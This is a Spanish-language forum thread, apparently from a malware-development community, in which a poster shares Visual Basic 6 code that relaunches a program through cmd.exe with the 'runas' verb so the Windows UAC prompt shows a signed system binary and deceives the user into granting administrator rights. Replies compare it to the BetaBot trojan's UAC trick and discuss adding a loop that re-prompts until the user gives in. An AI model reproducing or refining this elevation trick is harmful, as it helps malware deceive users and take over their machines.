Hola!

Dejo esta funcion para elevar la UAC utilizando ingeniería social

Si no se le dan los permisos, continua su ejecución normal.

Saqué la idea del UACtrick de Scorpio

Declaraciones:
[spoiler][code2=vbnet]Private Declare Function ShellExecute Lib "Shell32" Alias "ShellExecuteA" (ByVal hWnd As Long, ByVal lpOperation As String, ByVal lpFile As String, ByVal lpParameters As String, ByVal lpDirectory As String, ByVal nShowCmd As Long) As Long
Private Declare Function IsUserAnAdmin Lib "Shell32" Alias "#680" () As Integer[/code2][/spoiler]


Codigo:
[spoiler][code2=vbnet]If IsUserAnAdmin = 0 Then
If ShellExecute(0, "runas", "cmd.exe", " /c """ & App.path & "\" & App.EXEName & ".exe" & """", App.path & "\", vbNormalFocus) <> 5 Then
End
End If
End If
'.........
'Ejecucion de codigo normal....
'.........[/code2][/spoiler]


Probado en Win 7 x86 y Win 8.1 x64

Saludos!
Seria mas bien como forzar la UAC porque de ingeniería social no se le ve nada :S

Gracias por el codigo.
Saludos
Imagen
Pink escribió:Seria mas bien como forzar la UAC porque de ingeniería social no se le ve nada :S

Gracias por el codigo.
Saludos
Cuando le dan doble clic al programa...

En lugar de aparecer asi:

Imagen


Aparece asi:
Imagen


Capisce ?
Me parece una buena idea, sirve para confundir un poco y con buena conversación creo que pasa desapercibido a menos intendidos
"Concentrarse en las fortalezas, reconocer las debilidades, las oportunidades y tomar la guardia contra las amenazas."

―Sun Tzu
Claro que usa Ingenieria Social, trata de engañar al usuario al mostrar una aplicación de windows, es el mismo metodo que usaba la BetaBot, ahora creo que ya tiene Bypass UAC.

//Regards.
Ikarus: Backdoor.VBS.SafeLoader
Agnitum: Trojan.VBS.Safebot.A
http://indeseables.github.io/
1. Poor mod of MetalKindom method. (Next time give credits. )

2. What kind of trick it is? Where is the fucking loop ? LoL

3.Why da fuck you are passing "vbNormalFocus" as "nShowCmd" ? It also shows cmd window.

4.Nothings resembles with betabot SE.

Enzyme escribió:1. Poor mod of MetalKindom method. (Next time give credits. )

2. What kind of trick it is? Where is the fucking loop ? LoL

3.Why da fuck you are passing "vbNormalFocus" as "nShowCmd" ? It also shows cmd window.

4.Nothings resembles with betabot SE.
¿Metal Kingdom? This is my method.

This method try to open the uac dialog with a signed windows application.

Before, BetaBot he used this method. [Enlace externo eliminado para invitados]

//Regards.
Ikarus: Backdoor.VBS.SafeLoader
Agnitum: Trojan.VBS.Safebot.A
http://indeseables.github.io/
¿Metal Kingdom? This is my method.

This method try to open the uac dialog with a signed windows application.

Before, BetaBot he used this method. [Enlace externo eliminado para invitados]

//Regards.
LoL By "Metal Kingdom Method " I meant his UAC popup freeze aka -----------------> Loop Until Error <> 5

The crucial part in betabot UAC SE was that beautiful msgbox Where is that ? +few more things are missing too....
Enzyme escribió:
¿Metal Kingdom? This is my method.

This method try to open the uac dialog with a signed windows application.

Before, BetaBot he used this method. [Enlace externo eliminado para invitados]

//Regards.
LoL By "Metal Kingdom Method " I meant his UAC popup freeze aka -----------------> Loop Until Error <> 5

The crucial part in betabot UAC SE was that beautiful msgbox Where is that ? +few more things are missing too....
Eso de' error <> 5', lo descubrí yo, es tan simple como mostrar la UAC, cancelarla y revisar el codigo de error que retorna, no habia visto el de Metal.
Responder

Volver a “Fuentes”